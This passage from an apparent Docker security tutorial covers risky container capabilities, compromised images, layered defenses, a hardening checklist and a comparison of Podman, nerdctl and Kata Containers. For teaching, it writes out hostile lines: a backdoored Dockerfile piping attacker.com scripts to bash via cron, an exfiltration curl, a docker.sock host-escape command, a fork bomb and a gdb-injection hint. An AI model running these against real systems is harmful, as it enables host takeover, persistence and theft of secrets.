&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;CAP_SYS_PTRACE&lt;/strong&gt; — Allows attaching to any process:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Attach to dockerd or another container's PID 1&lt;/span&gt;
gdb &lt;span class="nt"&gt;-p&lt;/span&gt; &amp;lt;dockerd-pid&amp;gt;
&lt;span class="c"&gt;# Inject shellcode, steal secrets, modify memory&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;CAP_NET_ADMIN&lt;/strong&gt; — Network configuration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create network namespaces, sniff traffic&lt;/span&gt;
ip netns add attacker
&lt;span class="c"&gt;# Modify iptables rules&lt;/span&gt;
iptables &lt;span class="nt"&gt;-F&lt;/span&gt;  &lt;span class="c"&gt;# Flush all rules&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Defense:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Start with nothing, add only what's needed&lt;/span&gt;
docker run &lt;span class="nt"&gt;--cap-drop&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;ALL &lt;span class="nt"&gt;--cap-add&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;NET_BIND_SERVICE my-image

&lt;span class="c"&gt;# Audit what capabilities your containers actually use&lt;/span&gt;
docker inspect &amp;lt;container&amp;gt; | jq &lt;span class="s1"&gt;'.[].HostConfig.CapAdd'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
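&lt;p&gt;To audit what a &lt;em&gt;running&lt;/em&gt; process was actually granted (rather than what the container was started with), decode the kernel's capability bitmask directly: &lt;code&gt;CapEff&lt;/code&gt; in &lt;code&gt;/proc/self/status&lt;/code&gt; is a hex mask, and &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; is bit 21 (per &lt;code&gt;linux/capability.h&lt;/code&gt;). A sketch:&lt;/p&gt;

```shell
# CapEff is the effective capability set as a hex bitmask.
# CAP_SYS_ADMIN is bit 21; in a hardened container it should be 0.
capeff=$(awk '/^CapEff/ {print $2}' /proc/self/status)
echo "CapEff mask: $capeff"

# Extract bit 21 (2^21 = 2097152) with POSIX shell arithmetic
bit=$(( (0x$capeff / 2097152) % 2 ))
if [ "$bit" -eq 1 ]; then
  echo "CAP_SYS_ADMIN: present"
else
  echo "CAP_SYS_ADMIN: absent"
fi
```

&lt;p&gt;The same check works from inside a container: if the bit is set and you didn't ask for it, something in your launch configuration is too permissive.&lt;/p&gt;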



&lt;h3&gt;
  
  
  11.6 Attack Vector 5: Supply Chain (Compromised Images)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;The scenario:&lt;/strong&gt; You run &lt;code&gt;docker pull nginx&lt;/code&gt; and execute code you've never audited.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What could go wrong:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Backdoored base images:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="c"&gt;# Looks innocent&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; ubuntu:22.04&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; nginx

&lt;span class="c"&gt;# But the Dockerfile also did this:&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;curl http://attacker.com/backdoor.sh | bash
&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"* * * * * curl http://attacker.com/exfil.sh | bash"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /etc/cron.d/exfil
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Crypto miners:&lt;/strong&gt; Many compromised images quietly mine cryptocurrency, consuming CPU that you pay for in cloud bills.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Data exfiltration:&lt;/strong&gt; The container can read environment variables (&lt;code&gt;docker run -e DATABASE_PASSWORD=secret&lt;/code&gt;), mounted volumes, and make outbound network connections.&lt;/p&gt;
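&lt;p&gt;The environment-variable risk is easy to demonstrate: anything passed with &lt;code&gt;-e&lt;/code&gt; is inherited by &lt;em&gt;every&lt;/em&gt; process in the container, including an attacker's injected code. A sketch with a fake secret (no Docker needed; the shell's own environment shows the mechanism):&lt;/p&gt;

```shell
# Secrets in environment variables are readable by any child process -
# an attacker with code execution just calls printenv.
export DATABASE_PASSWORD="fake-secret-for-demo"

# Simulated attacker payload: no file access needed
stolen=$(sh -c 'printenv DATABASE_PASSWORD')
echo "exfiltrated: $stolen"
```

&lt;p&gt;File-based secrets (a read-only mounted file with tight permissions) at least give you permission bits to work with; the environment gives you none.&lt;/p&gt;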

&lt;p&gt;&lt;strong&gt;Defense layers:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Image scanning:&lt;/strong&gt; Scan for known CVEs before running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Using Trivy (open source)&lt;/span&gt;
trivy image nginx:latest

&lt;span class="c"&gt;# Example output:&lt;/span&gt;
&lt;span class="c"&gt;# nginx:latest (ubuntu 22.04)&lt;/span&gt;
&lt;span class="c"&gt;# Total: 24 (CRITICAL: 2, HIGH: 8, MEDIUM: 14)&lt;/span&gt;
&lt;span class="c"&gt;# CVE-2023-1234 | CRITICAL | openssl | 3.0.2-0ubuntu1 | Buffer overflow&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;2. Content trust / image signing:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Enable Docker Content Trust&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;DOCKER_CONTENT_TRUST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1

&lt;span class="c"&gt;# Only pull images signed with trusted keys&lt;/span&gt;
docker pull nginx:latest
&lt;span class="c"&gt;# Error: No trust data for latest&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;3. Use distroless or minimal base images:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="c"&gt;# Instead of ubuntu (72MB with shell, package manager, etc.)&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; gcr.io/distroless/base-debian11  # 20MB, no shell, no package manager&lt;/span&gt;

&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; my-app /app&lt;/span&gt;
&lt;span class="k"&gt;CMD&lt;/span&gt;&lt;span class="s"&gt; ["/app"]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Why? No shell = attacker can't run &lt;code&gt;curl | bash&lt;/code&gt; even if they compromise the app.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Run as non-root user:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; ubuntu:22.04&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;useradd &lt;span class="nt"&gt;-u&lt;/span&gt; 1001 &lt;span class="nt"&gt;-m&lt;/span&gt; appuser
&lt;span class="k"&gt;USER&lt;/span&gt;&lt;span class="s"&gt; appuser&lt;/span&gt;
&lt;span class="k"&gt;CMD&lt;/span&gt;&lt;span class="s"&gt; ["./my-app"]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now if the app is compromised, the attacker is UID 1001, not root.&lt;/p&gt;
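&lt;p&gt;A cheap complement to &lt;code&gt;USER&lt;/code&gt; is a guard in the entrypoint itself, so the image fails closed even if someone overrides the user at run time with &lt;code&gt;--user 0&lt;/code&gt;. A minimal sketch (the &lt;code&gt;exit&lt;/code&gt; is commented out so the snippet is safe to paste anywhere):&lt;/p&gt;

```shell
# Entrypoint guard: detect being launched as root and refuse to start.
# Complements USER in the Dockerfile against "docker run --user 0".
uid=$(id -u)
if [ "$uid" -eq 0 ]; then
  echo "refusing to run as root; set USER in the image or pass --user"
  # exit 1   # enable this in a real entrypoint
else
  echo "running as unprivileged UID $uid"
fi
```

&lt;p&gt;Belt and suspenders: the Dockerfile sets the default, the guard catches overrides.&lt;/p&gt;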

&lt;h3&gt;
  
  
  11.7 Defense in Depth: How the Layers Work Together
&lt;/h3&gt;

&lt;p&gt;Here's a concrete example of how multiple defenses stop an attack:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scenario:&lt;/strong&gt; An attacker exploits an RCE vulnerability in your web app running in a container.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Step 1: Attacker gets code execution inside container
        → They're running as UID 1001 (non-root user)

Step 2: Attacker tries: mount /dev/sda1 /mnt
        → BLOCKED by capabilities (no CAP_SYS_ADMIN)

Step 3: Attacker tries: docker run --privileged (via mounted socket)
        → BLOCKED - no Docker socket mounted

Step 4: Attacker tries: apt-get install nmap
        → BLOCKED - running distroless image (no package manager)

Step 5: Attacker tries: reboot
        → BLOCKED by seccomp (reboot syscall not allowed)

Step 6: Attacker tries: while true; do sh &amp;amp; done  (fork bomb)
        → BLOCKED by cgroups (pids.max = 100)

Step 7: Attacker tries: dd if=/dev/zero of=/file bs=1G count=100
        → BLOCKED - the root filesystem is read-only and /tmp is a small tmpfs

Step 8: Attacker tries: curl http://attacker.com/exfil &amp;lt; /app/secrets.txt
        → Limited damage - secrets were injected at startup, not stored in
          env vars or long-lived files, so there is little of value to read

Step 9: Attacker tries: rm -rf /app
        → BLOCKED - filesystem mounted read-only (--read-only flag)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Even with RCE, the attacker can't escape, can't persist, can't exfiltrate sensitive data, and can't cause resource exhaustion.&lt;/p&gt;

&lt;h3&gt;
  
  
  11.8 Hardening Checklist
&lt;/h3&gt;

&lt;p&gt;Here's a practical checklist for production containers:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="c"&gt;# Drop all capabilities, add back only what's needed&lt;/span&gt;
  &lt;span class="nt"&gt;--cap-drop&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;ALL &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--cap-add&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;NET_BIND_SERVICE &lt;span class="se"&gt;\&lt;/span&gt;

  &lt;span class="c"&gt;# Run as non-root&lt;/span&gt;
  &lt;span class="nt"&gt;--user&lt;/span&gt; 1001:1001 &lt;span class="se"&gt;\&lt;/span&gt;

  &lt;span class="c"&gt;# Read-only root filesystem&lt;/span&gt;
  &lt;span class="nt"&gt;--read-only&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--tmpfs&lt;/span&gt; /tmp:rw,noexec,nosuid,size&lt;span class="o"&gt;=&lt;/span&gt;100m &lt;span class="se"&gt;\&lt;/span&gt;

  &lt;span class="c"&gt;# Limit resources&lt;/span&gt;
  &lt;span class="nt"&gt;--memory&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;512m &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--cpus&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1.0 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--pids-limit&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;100 &lt;span class="se"&gt;\&lt;/span&gt;

  &lt;span class="c"&gt;# Enable security profiles&lt;/span&gt;
  &lt;span class="nt"&gt;--security-opt&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;no-new-privileges &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--security-opt&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;seccomp&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/path/to/custom-seccomp.json &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--security-opt&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;apparmor&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;docker-default &lt;span class="se"&gt;\&lt;/span&gt;

  &lt;span class="c"&gt;# Network isolation&lt;/span&gt;
  &lt;span class="nt"&gt;--network&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;isolated-net &lt;span class="se"&gt;\&lt;/span&gt;

  &lt;span class="c"&gt;# Never do this:&lt;/span&gt;
  &lt;span class="c"&gt;# --privileged                          # NO!&lt;/span&gt;
  &lt;span class="c"&gt;# -v /var/run/docker.sock:/var/...      # NO!&lt;/span&gt;
  &lt;span class="c"&gt;# -v /:/host                             # NO!&lt;/span&gt;
  &lt;span class="c"&gt;# --cap-add=SYS_ADMIN                    # NO!&lt;/span&gt;

  my-app:latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  11.9 The Bottom Line
&lt;/h3&gt;

&lt;p&gt;Docker's security model is &lt;strong&gt;kernel-based isolation&lt;/strong&gt;, not &lt;strong&gt;hypervisor-based isolation&lt;/strong&gt;. This means:&lt;/p&gt;

&lt;p&gt;✅ &lt;strong&gt;Fast:&lt;/strong&gt; No VM overhead&lt;br&gt;
✅ &lt;strong&gt;Efficient:&lt;/strong&gt; Shared kernel, minimal duplication&lt;br&gt;
❌ &lt;strong&gt;Shared attack surface:&lt;/strong&gt; One kernel vulnerability can break all containers&lt;/p&gt;

&lt;p&gt;For &lt;strong&gt;untrusted workloads&lt;/strong&gt; (running customer code, multi-tenant SaaS), consider:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Kata Containers&lt;/strong&gt; (VM-based isolation - see Section 12)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;gVisor&lt;/strong&gt; (userspace kernel emulation)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Firecracker&lt;/strong&gt; (microVMs)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For &lt;strong&gt;trusted workloads&lt;/strong&gt; (your own apps), Docker's default security + hardening is sufficient — just follow the checklist above.&lt;/p&gt;

&lt;p&gt;The key insight: Security isn't binary. It's about &lt;strong&gt;reducing the blast radius&lt;/strong&gt; when (not if) something goes wrong.&lt;/p&gt;




&lt;h2&gt;
  
  
  12. Docker vs. Podman vs. nerdctl vs. Kata Containers
&lt;/h2&gt;

&lt;p&gt;Now that we've internalized how Docker works layer by layer, the natural question is: &lt;em&gt;what are the alternatives, and where do they diverge at the architectural level?&lt;/em&gt; This section isn't a feature checklist — it's a structural comparison. Every difference traced below maps directly to the internals we covered above.&lt;/p&gt;

&lt;h3&gt;
  
  
  12.1 Architectural Comparison at a Glance
&lt;/h3&gt;

&lt;p&gt;The single biggest differentiator across all these tools is &lt;strong&gt;where in the stack they place the daemon&lt;/strong&gt; — or deliberately remove it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftwoczpgg8syl4exdkymz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftwoczpgg8syl4exdkymz.png" alt="architectural comparison" width="800" height="408"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  12.2 Docker — The Daemon-Centric Model
&lt;/h3&gt;

&lt;p&gt;Docker's architecture is exactly what we dissected in Sections 2–5. The defining characteristic is the &lt;strong&gt;persistent root daemon&lt;/strong&gt; (&lt;code&gt;dockerd&lt;/code&gt;). Every container operation routes through it. This gives Docker a centralized control plane — easy to manage, easy to expose remotely via API — but it also means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A daemon crash can take down every container on the host (unless &lt;code&gt;live-restore&lt;/code&gt; is enabled, which lets running containers survive daemon restarts).&lt;/li&gt;
&lt;li&gt;The daemon socket (&lt;code&gt;/var/run/docker.sock&lt;/code&gt;) is a high-value attack target. Anyone who can write to it has full host control.&lt;/li&gt;
&lt;li&gt;Docker &lt;em&gt;does&lt;/em&gt; offer a rootless mode (experimental since Engine 19.03, generally available in 20.10), but it works by running the daemon itself inside a user namespace rather than removing the daemon entirely. It improves security but retains the fundamental client-server shape.&lt;/li&gt;
&lt;/ul&gt;
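&lt;p&gt;It's worth seeing just how much power that socket carries. A sketch, assuming a local rootful Docker install (don't run the last command anywhere you care about):&lt;/p&gt;

```shell
# The socket is root-owned; the docker group grants write access
ls -l /var/run/docker.sock
# srw-rw---- 1 root docker 0 ... /var/run/docker.sock

# Anyone who can write to it is root-equivalent on the host:
# mount the host filesystem and chroot into it
docker run --rm -it -v /:/host alpine chroot /host sh
```

This is why "membership in the docker group" is effectively root, and why mounting the socket into a container undoes every other hardening measure.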

&lt;p&gt;Docker's strength remains its ecosystem — over 20 million developers, deep integration with CI/CD platforms (GitHub Actions, Jenkins, GitLab), and Docker Hub as the dominant public registry.&lt;/p&gt;

&lt;h3&gt;
  
  
  12.3 Podman — The Daemonless, Rootless Alternative
&lt;/h3&gt;

&lt;p&gt;Podman (created by Red Hat) flips the architectural model. There is &lt;strong&gt;no persistent background daemon&lt;/strong&gt;. When you run &lt;code&gt;podman run nginx&lt;/code&gt;, the CLI forks a small per-container monitor process (&lt;code&gt;conmon&lt;/code&gt;) that invokes &lt;code&gt;runc&lt;/code&gt; (or &lt;code&gt;crun&lt;/code&gt;). Each container is a direct child of your shell or of &lt;code&gt;systemd&lt;/code&gt; — the process tree looks like normal user processes.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe1mh419lj3ytp5wzwcml.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe1mh419lj3ytp5wzwcml.png" alt="podman" width="800" height="467"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The security implications are substantial. With no central daemon, there is no persistent privileged service and no root-owned socket waiting to be hijacked; the daemon simply disappears as an attack surface.&lt;/p&gt;

&lt;p&gt;Rootless operation is where Podman's architecture truly shines. Podman allows regular unprivileged users to run containers without requiring any root privileges on the host, leveraging user namespaces: inside the container, processes can run as root (UID 0) but that root is mapped to an unprivileged user ID on the host.&lt;/p&gt;
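&lt;p&gt;You can observe the mapping directly. A sketch, assuming rootless Podman is installed; the host-side IDs shown are typical example values, not guarantees:&lt;/p&gt;

```shell
# Run as a regular user -- no sudo anywhere
podman run --rm alpine id -u
# prints 0: "root" inside the container...

# ...but the user namespace tells the real story
podman unshare cat /proc/self/uid_map
#          0       1000          1
#          1     100000      65536
# container UID 0 maps to your host UID (e.g. 1000);
# UIDs 1 and up map into the subordinate range from /etc/subuid
```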

&lt;p&gt;Podman's networking in rootless mode uses &lt;strong&gt;slirp4netns&lt;/strong&gt; or the newer &lt;strong&gt;pasta&lt;/strong&gt; backend (the default since Podman 5.0) for user-mode networking, rather than Docker's privileged bridge + iptables approach. This is a meaningful trade-off: Docker's mature, privileged networking can achieve higher throughput (8–10 Gbps), while rootless Podman networking, though much improved with the pasta backend, typically peaks around 2–4 Gbps.&lt;/p&gt;

&lt;p&gt;Podman also has a native concept of &lt;strong&gt;pods&lt;/strong&gt; — groups of containers that share a network namespace — which maps directly to the Kubernetes Pod model. You can use &lt;code&gt;podman generate kube&lt;/code&gt; to create Kubernetes manifests directly from running containers, and &lt;code&gt;podman play kube&lt;/code&gt; to deploy them.&lt;/p&gt;
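&lt;p&gt;The pod workflow looks like this in practice (names are illustrative):&lt;/p&gt;

```shell
# Create a pod: its containers share one network namespace
podman pod create --name web -p 8080:80
podman run -d --pod web nginx
podman run -d --pod web redis

# Export the running pod as a Kubernetes manifest...
podman generate kube web > web-pod.yaml

# ...and replay it later, or hand it to a cluster
podman play kube web-pod.yaml
```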

&lt;h3&gt;
  
  
  12.4 nerdctl — Direct Access to containerd
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;nerdctl&lt;/code&gt; is a Docker-compatible CLI that talks directly to &lt;strong&gt;containerd&lt;/strong&gt; via gRPC — completely bypassing &lt;code&gt;dockerd&lt;/code&gt;. The architecture is simpler than Docker's (no extra daemon layer on top of containerd) but still daemon-based, since containerd itself runs as a persistent service.&lt;/p&gt;

&lt;p&gt;The goal of nerdctl is to facilitate experimenting with cutting-edge features of containerd that are not present in Docker, including on-demand image pulling (lazy-pulling) and image encryption/decryption.&lt;/p&gt;

&lt;p&gt;The standout features that nerdctl exposes — which Docker does not yet support natively — include:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lazy pulling (eStargz / Nydus / SOCI):&lt;/strong&gt; Traditional image pulls download every layer before the container can start. Lazy pulling streams layers on demand — the container starts running while layers it hasn't touched yet are still downloading. This can dramatically reduce cold-start times for large images.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Image encryption (OCIcrypt):&lt;/strong&gt; Layers can be encrypted at rest and in transit. The decryption key is provided at runtime, meaning even a compromised registry can't expose image contents.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;P2P image distribution (IPFS):&lt;/strong&gt; Images can be pushed and pulled over IPFS, removing reliance on centralized registries entirely.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Image signing (cosign):&lt;/strong&gt; Native &lt;code&gt;--verify=cosign&lt;/code&gt; on pull and &lt;code&gt;--sign=cosign&lt;/code&gt; on push, bringing software supply chain security into the CLI workflow.&lt;/p&gt;

&lt;p&gt;Unlike &lt;code&gt;ctr&lt;/code&gt; (containerd's own debugging CLI), nerdctl aims to be user-friendly and Docker-compatible. To some extent, nerdctl + containerd can seamlessly replace docker + dockerd. It also supports &lt;code&gt;nerdctl compose&lt;/code&gt;, making multi-container workflow migration straightforward.&lt;/p&gt;
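&lt;p&gt;A sketch of what those features look like on the command line; the image references and key files are illustrative, and lazy pulling assumes the stargz snapshotter is configured in containerd:&lt;/p&gt;

```shell
# Lazy pulling: the container starts before all layers finish downloading
nerdctl --snapshotter=stargz run -it --rm ghcr.io/stargz-containers/python:3.9-esgz python3

# Supply-chain checks built into push/pull
nerdctl push --sign=cosign --cosign-key cosign.key registry.example.com/my-app:1.0
nerdctl pull --verify=cosign --cosign-key cosign.pub registry.example.com/my-app:1.0

# Docker-compatible compose workflow, straight against containerd
nerdctl compose up -d
```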

&lt;h3&gt;
  
  
  12.5 Kata Containers — VM-Based Isolation
&lt;/h3&gt;

&lt;p&gt;All three tools above (Docker, Podman, nerdctl) share the same fundamental isolation boundary: &lt;strong&gt;Linux namespaces and cgroups on a shared kernel.&lt;/strong&gt; If a kernel vulnerability is exploited, isolation can be broken. Kata Containers solves this by replacing the namespace boundary with a &lt;strong&gt;hardware virtualization boundary&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;At its core, Kata Containers sits underneath your existing container runtime and launches every container (or pod) inside a lightweight VM. Each container gets its own &lt;strong&gt;guest kernel&lt;/strong&gt; running inside a microVM spawned by a hypervisor (QEMU, Cloud-Hypervisor, or AWS Firecracker).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc88c21w008qkx60ikpv4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc88c21w008qkx60ikpv4.png" alt="kata containers" width="800" height="1318"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The Kata runtime launches each container (or pod) within its own hardware-isolated VM, and each VM runs its own kernel. Because of this stronger isolation, some container features either cannot be supported or are effectively provided by the VM itself rather than the host.&lt;/p&gt;

&lt;p&gt;The trade-off is cold-start latency and memory overhead. Although improving, booting VMs takes longer than containers, and VMs have more overhead than namespace-based containers. Firecracker (AWS's microVM hypervisor) has brought boot times down to around 125ms, making this viable for serverless and multi-tenant workloads — but it's still measurably slower than a pure namespace-based container.&lt;/p&gt;
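&lt;p&gt;Switching a workload onto Kata is a runtime selection, not an image rewrite. A sketch, assuming Kata is installed and registered with the Docker daemon under the runtime name &lt;code&gt;kata-runtime&lt;/code&gt;:&lt;/p&gt;

```shell
# Same image, namespace-based isolation: shows the HOST kernel
docker run --rm alpine uname -r

# Same image under Kata: shows the GUEST kernel inside the microVM
docker run --rm --runtime=kata-runtime alpine uname -r
```

The two `uname -r` outputs differing is the whole story: under Kata, the container no longer shares the host kernel.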

&lt;h3&gt;
  
  
  12.6 Head-to-Head: The Architectural Trade-offs
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Daemon?&lt;/th&gt;
&lt;th&gt;Rootless by default?&lt;/th&gt;
&lt;th&gt;Isolation boundary&lt;/th&gt;
&lt;th&gt;Kernel shared?&lt;/th&gt;
&lt;th&gt;Best fit&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;🐋 &lt;strong&gt;Docker&lt;/strong&gt; (Engine 28.x)&lt;/td&gt;
&lt;td&gt;✅ &lt;code&gt;dockerd&lt;/code&gt; (persistent, root)&lt;/td&gt;
&lt;td&gt;❌ Rootful by default&lt;/td&gt;
&lt;td&gt;Namespaces + cgroups&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;Developer experience, ecosystem breadth, CI/CD integration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;🦑 &lt;strong&gt;Podman&lt;/strong&gt; (5.x)&lt;/td&gt;
&lt;td&gt;❌ None (fork/exec model)&lt;/td&gt;
&lt;td&gt;✅ Yes (user namespaces)&lt;/td&gt;
&lt;td&gt;Namespaces + cgroups&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;Security-first, Kubernetes alignment, enterprise / regulated&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;📦 &lt;strong&gt;nerdctl&lt;/strong&gt; (2.x)&lt;/td&gt;
&lt;td&gt;✅ &lt;code&gt;containerd&lt;/code&gt; (lightweight)&lt;/td&gt;
&lt;td&gt;⚠️ Supported, not default&lt;/td&gt;
&lt;td&gt;Namespaces + cgroups&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;Cutting-edge features, lazy pull / encryption, K8s debugging&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;🛡️ &lt;strong&gt;Kata Containers&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;✅ &lt;code&gt;containerd&lt;/code&gt; + kata-shim&lt;/td&gt;
&lt;td&gt;N/A (VM boundary)&lt;/td&gt;
&lt;td&gt;Hardware VM (KVM / Firecracker)&lt;/td&gt;
&lt;td&gt;❌ Each container = own kernel&lt;/td&gt;
&lt;td&gt;Multi-tenant clouds, regulated workloads, untrusted code&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

